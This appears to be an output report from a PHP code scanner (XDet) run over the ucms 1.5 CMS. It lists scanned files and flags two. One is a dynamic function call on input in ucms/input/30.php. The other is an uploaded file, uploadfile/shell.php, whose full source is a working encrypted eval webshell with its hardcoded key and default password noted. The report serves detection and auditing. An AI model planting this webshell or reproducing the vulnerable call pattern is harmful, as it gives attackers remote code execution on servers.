XDet 扫描报告

python3 xdet.py -o XDet-2021-05-10-164703.html /Users/inspringz/Desktop/ucms_1.5

2021-05-10-16:47:03 ~ 2021-05-10-16:47:14
扫描 PHP 文件 104 个，发现 2 处隐患。

Overview

状态	文件名	标签
normal	/Users/inspringz/Desktop/ucms_1.5/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/inc/config_reinstall.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/inc/config.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/inc/func.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/inc/config_default.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/login.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/ajax.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/top.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/upload.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/chk.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/install/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/8.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/kses.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/9.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/28.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/14.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/15.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/29.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/17.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/16.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/12.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/11.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/10.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/21.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/22.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/23.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/27.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/26.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/24.php	0
danger	/Users/inspringz/Desktop/ucms_1.5/ucms/input/30.php	1
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/18.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/19.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/4.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/5.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/7.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/6.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/2.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/3.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/input/1.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/add.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/editpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/addpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/del.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/edit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/my.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/user/mypost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/add.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/editpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/move.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/addpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/del.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/list/edit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/str/editpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/str/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/str/cache.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/fileedit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/sdel.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/corder.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/code.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/aedit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/sbasic.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/sbasicedit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cedit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/file.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/saddpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/aeditpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/adel.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cdel.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cineditjs.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/url.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/ceditpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/caddpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cout.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/aindex.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/seditpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cinedit.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cineditpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cin.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/aaddpost.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/ain.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/ucms/sadmin/cadd.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/right_article.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/right_channel.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/list.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/header.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/footer.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/page.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/article.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/right_ad.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/ad.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/index.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/new_article.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/list.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/header.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/channel.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/footer.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/page.php	0
normal	/Users/inspringz/Desktop/ucms_1.5/template/m/article.php	0
danger	/Users/inspringz/Desktop/ucms_1.5/uploadfile/shell.php	1

Vulnerability

/Users/inspringz/Desktop/ucms_1.5/ucms/input/30.php

Level Size Last Modify

danger 230B 2020-08-08 08:00:00

Level	Size	Last Modify
danger	230B	2020-08-08 08:00:00
Code `<?php $functionname=$strarray[0]; if(!function_exists($functionname)) { echo($functionname.' 函数不存在,'); htmlinput_error($inputarray['from'],$inputarray['id']); } $functionname('output',$inputname,$inputvalue); ?>`

Code

<?php
$functionname=$strarray[0];
if(!function_exists($functionname)) {
	echo($functionname.' 函数不存在,');
	htmlinput_error($inputarray['from'],$inputarray['id']);
}
$functionname('output',$inputname,$inputvalue);
?>

/Users/inspringz/Desktop/ucms_1.5/uploadfile/shell.php

Level Size Last Modify

danger 619B 2021-05-10 15:48:56

Level	Size	Last Modify
danger	619B	2021-05-10 15:48:56
Code <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('\|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>

Code

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>